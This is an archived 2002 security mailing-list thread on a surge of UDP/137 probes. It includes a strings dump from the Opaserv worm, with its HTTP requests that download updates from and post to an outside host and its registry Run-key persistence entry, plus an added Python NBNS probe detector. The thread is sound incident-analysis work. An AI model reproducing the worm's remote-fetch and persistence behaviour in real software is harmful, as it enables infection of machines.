Security Incidents
mailing list archives
RE: Unusual volume: UDP:137 probes
From: Richard.Grant () mail state ky us
Date: Tue, 1 Oct 2002 09:44:29 -0400
We had some internal machines that were contributing to the netbios flood
attack. These machines were sniffed, and from that we found a file on the
identified machines named scrsvr.exe. The file was reverse engineered and
the results are listed below. While some are attributing the netbios
activity to Bugbear@mm, it does not follow what we were seeing. It is known
as W32.Opaserv.Worm. Comments?
Strings recovered from scrsvr.exe (one per line; ".." marks the CR LF pairs
inside the HTTP requests):

ScrSvr31415
KERNEL32.dll
RegisterServiceProcess
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Internet Settings
ScrSvr
ScrSvrOld
ProxyEnable
ProxyServer
\ScrSvr.exe
ScrSin.dat
ScrSout.dat
scrupd.exe
www.opasoft.com
GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1..Host: www.opasoft.com....
GET http://www.opasoft.com/work/lastver HTTP/1.1..Host: www.opasoft.com....
GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1..Host: www.opasoft.com....
POST http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1..Host: www.opasoft.com....
OK
PLAIN
CIPHER1
KEY
WINDOWS\scrsvr.exe
WINDOWS\win.ini
c:\tmp.ini
c:\windows\scrsvr.exe
,
windows
run
CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
LOCALHOST
Import table:

DLLs: KERNEL32.dll, ADVAPI32.dll, USER32.dll, WS2_32.dll

Functions: LocalAlloc, GetCurrentProcess, ExitThread, SetFilePointer,
ResetEvent, ReadFile, CreateMutexA, LocalFree, GetModuleFileNameA,
SetPriorityClass, SetEndOfFile, GetModuleHandleA, RegisterServiceProcess,
GetPrivateProfileStringA, GetProcAddress, ExitProcess, CopyFileA,
LocalReAlloc, CreateProcessA, CloseHandle, WaitForSingleObject, Sleep,
CreateThread, CreateFileA, GetLastError, SetCurrentDirectoryA, DeleteFileA,
GetFileSize, WriteFile, WritePrivateProfileStringA, lstrcat, lstrcmpi,
lstrlen, GetWindowsDirectoryA, RegSetValueExA, RegQueryValueExA,
RegOpenKeyExA, RegDeleteValueA, RegCloseKey, PeekMessageA, DispatchMessageA,
TranslateMessage, socket, send, recvfrom, recv, inet_addr, gethostname,
gethostbyname, connect, closesocket, bind, WSAStartup, sendto,
WSAGetLastError, WSAEventSelect, WSAEnumNetworkEvents, WSACreateEvent,
WSACloseEvent
Richard Grant [CNA, GSEC]
Security Engineer
Governor's Office for Technology
Commonwealth of Kentucky
Phone: 502-564-5792
Fax: 502.564.6856
richard.grant () mail state ky us
Web: http://www.state.ky.us/got/ois/security/security.html
CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is
for the sole use of the intended recipient(s) and may contain confidential
and privileged information. Any unauthorized review, use, disclosure or
distribution is prohibited. If you are not the intended recipient, please
contact the sender by reply e-mail and destroy all copies of the original
message.
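Editor's note on the dump above: the 32-character string CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is a NetBIOS name in RFC 1002 first-level encoding. It decodes to the wildcard name "*" followed by fifteen 0x00 bytes, which is the name carried by a node-status (NBSTAT) request over UDP/137, consistent with the UDP:137 probe volume this thread is about. The Python below is an added example, not code from the original post or from the scrsvr.exe sample; it encodes and decodes such names from raw NBNS datagrams and separates wildcard node-status probes from ordinary name lookups so captured UDP/137 traffic can be triaged. The packet layout follows RFC 1002; the two sample packets, their transaction IDs, flag values and the host name FILESRV are constructed for the example.

```python
"""NetBIOS Name Service (UDP/137) query decoding and wildcard node-status
probe detection.

Added example for this thread; not code from the original post or from the
scrsvr.exe sample it describes.  Field layout follows RFC 1002.  The sample
packets, transaction IDs, flags and the host name FILESRV are constructed.
"""
import struct
from typing import Dict, Tuple

QTYPE_NB = 0x0020      # name query
QTYPE_NBSTAT = 0x0021  # node status request (what "nbtstat -A <ip>" sends)
QCLASS_IN = 0x0001


def encode_nb_name(name: str, suffix: int = 0x00, pad: bytes = b" ") -> bytes:
    """First-level encoding: pad the name to 15 bytes, append the 1-byte
    suffix, then write each nibble of the 16 bytes as chr(0x41 + nibble),
    giving a 32-character label made only of the letters A..P."""
    raw = name.encode("ascii")[:15].ljust(15, pad) + bytes([suffix & 0xFF])
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)


def decode_nb_name(label: bytes) -> Tuple[str, int]:
    """Reverse of encode_nb_name: returns (name, suffix).  Padding is
    stripped whether it is spaces (normal names) or NULs (the '*' wildcard)."""
    if len(label) != 32 or any(c < 0x41 or c > 0x50 for c in label):
        raise ValueError("not a first-level-encoded NetBIOS label")
    raw = bytes(((label[i] - 0x41) << 4) | (label[i + 1] - 0x41)
                for i in range(0, 32, 2))
    name = raw[:15].rstrip(b" \x00").decode("ascii", "replace")
    return name, raw[15]


def parse_nbns_query(pkt: bytes) -> Dict[str, object]:
    """Parse the header and the single question of an NBNS query datagram."""
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", pkt[:12])
    if flags & 0x8000:
        raise ValueError("QR bit set: this is a response, not a query")
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos = 12
    if pkt[pos] != 32:
        raise ValueError("first label must be the 32-byte encoded name")
    label = pkt[pos + 1:pos + 33]
    pos += 33
    scope = []                      # optional scope-ID labels follow the name
    while pkt[pos] != 0:
        n = pkt[pos]
        scope.append(pkt[pos + 1:pos + 1 + n].decode("ascii", "replace"))
        pos += 1 + n
    pos += 1                        # terminating zero-length label
    qtype, qclass = struct.unpack("!HH", pkt[pos:pos + 4])
    name, suffix = decode_nb_name(label)
    return {"txid": txid, "name": name, "suffix": suffix,
            "scope": ".".join(scope), "qtype": qtype, "qclass": qclass}


def is_wildcard_node_status_probe(pkt: bytes) -> bool:
    """True for an NBSTAT query against the wildcard name '*', the packet a
    host sweep of UDP/137 produces.  Malformed input is reported as not a probe."""
    try:
        q = parse_nbns_query(pkt)
    except (ValueError, IndexError, struct.error):
        return False
    return q["qtype"] == QTYPE_NBSTAT and q["name"] == "*"


def build_nbns_query(txid: int, label: bytes, qtype: int, flags: int = 0x0000) -> bytes:
    """Assemble a one-question NBNS query (used here only to construct samples)."""
    header = struct.pack("!6H", txid, flags, 1, 0, 0, 0)
    question = bytes([32]) + label + b"\x00" + struct.pack("!HH", qtype, QCLASS_IN)
    return header + question


# Constructed samples.  WILDCARD_LABEL is the 32-character string from the
# strings dump; it decodes to '*' followed by fifteen 0x00 bytes.
WILDCARD_LABEL = b"CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
SAMPLE_PROBE = build_nbns_query(0x1234, WILDCARD_LABEL, QTYPE_NBSTAT)
# Contrast: an ordinary broadcast name query for a workstation called FILESRV
# (flags 0x0110 = recursion desired + broadcast bit, as Windows name queries set).
SAMPLE_LOOKUP = build_nbns_query(0x1235, encode_nb_name("FILESRV"), QTYPE_NB, 0x0110)

if __name__ == "__main__":
    for pkt in (SAMPLE_PROBE, SAMPLE_LOOKUP):
        q = parse_nbns_query(pkt)
        verdict = "wildcard node-status probe" if is_wildcard_node_status_probe(pkt) else "ordinary lookup"
        print(hex(q["txid"]), repr(q["name"]), hex(q["qtype"]), verdict)
```

To apply this to a capture, feed `is_wildcard_node_status_probe` the UDP payload of each inbound port-137 datagram; a high ratio of wildcard NBSTAT queries to ordinary name queries from many distinct sources is the signature of a sweep rather than normal browsing traffic.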
-----Original Message-----
From: Emeric Miszti [mailto:emeric () uksecurityonline com]
Sent: Monday, September 30, 2002 11:55 AM
To: incidents () securityfocus com
Subject: Re: Unusual volume: UDP:137 probes
On Monday 30 Sep 2002 9:33 am, Mark Forsyth wrote:
On Monday, September 30, 2002 9:02 AM, John Sage
[SMTP:jsage () finchhaven com] wrote:
This has received some mention on the UNISOG list and elsewhere, but
not here.
Some people have been seeing unusually high volumes of UDP:137 probes
since about 09/27/02 late, or early 09/28/02.
A few people (who log such things) on the Optus cable network in Australia
have been seeing it too.
In my case since Sep 20 it's gone ...
Sep 20 2 hits
Sep 21, 22, 23 0 hits
Sep 24 3 hits
Sep 25 0 hits
Sep 26 4 hits
Sep 27 2 hits
Sep 28 156 hits Starting at 02:20 (Aust. EST)
Sep 29 410 hits
Sep 30 406 hits up until 18:24
Been seeing exactly the same spike with same patterns. Up from 40 odd scans
on 28/9/2002 to 495 already today.
Incidents.org have picked this up at the Internet Storm Center
http://isc.incidents.org/port_details.html?port=137
No explanations or reasons been given by anyone yet.
--
Emeric Miszti
UK Security Online
http://www.uksecurityonline.com
Tel No: 0870 088 5689
Fax No: 0870 706 2162
PGP Public Key available at
http://www.uksecurityonline.com/emeric.asc
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com